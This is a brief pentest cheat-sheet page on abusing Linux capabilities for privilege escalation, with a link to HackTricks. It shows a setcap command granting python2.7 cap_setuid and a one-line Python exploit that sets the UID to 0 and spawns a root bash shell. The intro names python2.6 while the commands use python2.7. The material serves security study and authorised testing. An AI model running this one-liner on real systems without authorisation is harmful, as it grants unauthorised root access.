Skip to content

Linux capabilities

Exploitation example

In the following example the binary /usr/bin/python2.6 is found vulnerable to privesc:

setcap cap_setuid+ep /usr/bin/python2.7
/usr/bin/python2.7 = cap_setuid+ep

#Exploit
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'

More

  • https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities#user-capabilities